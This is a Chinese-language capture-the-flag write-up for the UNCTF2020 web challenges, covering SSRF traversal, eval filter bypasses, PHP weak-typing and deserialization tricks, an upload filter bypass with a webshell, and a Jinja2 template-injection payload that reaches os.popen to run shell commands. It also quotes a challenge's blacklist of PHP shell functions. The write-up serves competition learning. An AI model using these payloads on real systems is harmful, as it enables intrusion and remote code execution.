UNCTF2020 | Web Wp
文章目錄
- Web
- 0x01:easy_ssrf
- 0x02:babyeval
- 0x03:ezphp
- 0x04:easy_upload
- 0x05:L0vephp
- 0x06:easyflask
- 0x07:easyunserialize
- 總結(jié)
Web
0x01:easy_ssrf
代碼很簡單,參數(shù)中要有unctf.com,而且過濾了php|file|zip|bzip|zlib|base|data,導(dǎo)致很多協(xié)議用不了,查了查資料發(fā)現(xiàn)涉及到SSRF file_get_contents函數(shù)都是利用的file協(xié)議等,一開始也沒思路要怎么繞過去。
然后查了一篇師傅的博客記載了一個SSRF的一個黑魔法:
當(dāng)PHP的 file_get_contents() 函數(shù)在遇到不認(rèn)識的偽協(xié)議頭時候會將偽協(xié)議頭當(dāng)做文件夾,造成目錄穿越漏洞,這時候只需不斷往上跳轉(zhuǎn)目錄即可讀到根目錄的文件。這個方法可以在SSRF的眾多協(xié)議被ban的情況下來進(jìn)行讀取文件
發(fā)現(xiàn)確實(shí)可以造成目錄穿越,直接讀取下flag
0x02:babyeval
過濾了帶括號的函數(shù),可以使用echo進(jìn)行輸出內(nèi)容,通過include包含flag.php,再輸出變量即可(感覺是非預(yù)期,因?yàn)閛b_start函數(shù)沒有用到)
payload:
?a=include "flag.php";echo $flag;ob_start([string output_callback])- 打開輸出緩沖區(qū),所有的輸出信息不在直接發(fā)送到瀏覽器,而是保存在輸出緩沖區(qū)里面,可選得回調(diào)函數(shù)用于處理輸出結(jié)果信息。
這道題設(shè)置的是輸出信息中不能存在flag,所以可以利用編碼繞過
?a=echo `base64 flag.php`;
也可以通過include+偽協(xié)議去讀取
0x03:ezphp
bool類型的true跟任意字符串可以弱類型相等。因此我們可以構(gòu)造bool類型的序列化數(shù)據(jù) ,無論比較的值是什么,結(jié)果都為true
payload:
<?php error_reporting(0); $shy=''; $shy=array("username"=>1,"password"=>1); echo var_dump($shy); echo var_dump(serialize($shy));$shy=''; $shy=array("username"=>true,"password"=>true); echo var_dump($shy); echo var_dump(serialize($shy)); ?>0x04:easy_upload
上傳一個php文件,發(fā)現(xiàn)過濾了以下內(nèi)容
查了資料,發(fā)現(xiàn)是De1CTF2020的原題,既然過濾了ph,可以使用換行進(jìn)行繞過
還過濾了>,可以使用
上傳進(jìn)去,蟻劍連接之后便可以在根目錄中發(fā)現(xiàn)flag
0x05:L0vephp
提示是查看頁面源碼
一開始也不知道是什么編碼,查了查字資料發(fā)現(xiàn)是base85(也稱為Ascii85)
可以參考一下
https://www.cnblogs.com/0yst3r-2046/p/11962942.html
在線解一下,得到
提示讀取一下源碼,嘗試一下偽協(xié)議讀取,發(fā)現(xiàn)
發(fā)現(xiàn)被過濾了,再試試其他方法,發(fā)現(xiàn)換成以下兩種都可以
解密得到
得到1nD3x.php,得到以下源碼
<?php error_reporting(0); show_source(__FILE__); $code=$_REQUEST['code'];$_=array('@','\~','\^','\&','\?','\<','\>','\*','\`','\+','\-','\'','\"','\\\\','\/'); $__=array('eval','system','exec','shell_exec','assert','passthru','array_map','ob_start','create_function','call_user_func','call_user_func_array','array_filter','proc_open'); $blacklist1 = array_merge($_); $blacklist2 = array_merge($__);if (strlen($code)>16){die('Too long'); }foreach ($blacklist1 as $blacklisted) { if (preg_match ('/' . $blacklisted . '/m', $code)) { die('WTF???'); } } foreach ($blacklist2 as $blackitem) {if (preg_match ('/' . $blackitem . '/im', $code)) {die('Sry,try again');} }@eval($code); ?>之前無命令進(jìn)行構(gòu)造,長度沒有限制的這么短,而且這道題過濾了很多,之前的異或什么的都走不通,查資料看了P神的這篇文章,發(fā)現(xiàn)了新的思路,真的是tttttql
eval長度限制繞過 && PHP5.6新特性
按照P神的payload即可獲取到flag,有空要仔細(xì)研究一下。
0x06:easyflask
一看名字就猜測是不是ssti,進(jìn)去之后需要先以admin用戶登陸進(jìn)去,發(fā)現(xiàn)存在login和register路由,以admin用戶注冊一個賬號即可獲取到/secret_route_you_do_not_know路由
在該路由下存在ssti漏洞,但是過濾以下字符
' " [ ] _可以使用|attr和request.args.xx來繞過下劃線和引號,request.args存儲著請求參數(shù)以及其值的字典,接下來就是構(gòu)造payload即可
{{()|attr(request.args.class)|attr(request.args.bases)|attr(request.args.subclasses)()|attr(request.args.a)(117)|attr(request.args.b)|attr(request.args.c)|attr(request.args.d)(request.args.e)(request.args.f)|attr(request.args.g)()}}&class=__class__&bases=__base__&subclasses=__subclasses__&a=__getitem__&b=__init__&c=__globals__&d=get&e=popen&f=cat flag.txt&g=read0x07:easyunserialize
先拉到本地測試一下,修改一下源碼,讓結(jié)果回顯出來
觀察代碼也很簡單,用戶名沒有限制,密碼必須為easy,才可以得到flag,就先正常反序列化一個這樣的payload
其中";s:8:"password";s:4:"easy";}是29個字符,下面就是一個數(shù)學(xué)問題了,過濾后字符變多了四個,把";s:8:"password";s:4:"easy";}給擠出去,閉合之前的值1即可
strlen(challenge(9)*n+29)=strlen(easychallenge(13)*n) 9*n+29=13*n 4n=29+3 n=>8多出三個字符,前面肯定是不能添加的,所以可以放在最后面,根據(jù)反序列化的特點(diǎn)超出的部分并不會被反序列化成功,所以不會產(chǎn)生任何影響,payload如下:
?1=challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";}shy總結(jié)
還有幾道題當(dāng)時沒做出來,等這幾天事忙了完,再回頭了做下!
總結(jié)
以上是生活随笔為你收集整理的UNCTF2020 | Web Wp的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Python Pickle反序列化漏洞
- 下一篇: 一周刷题记录 | WebMisc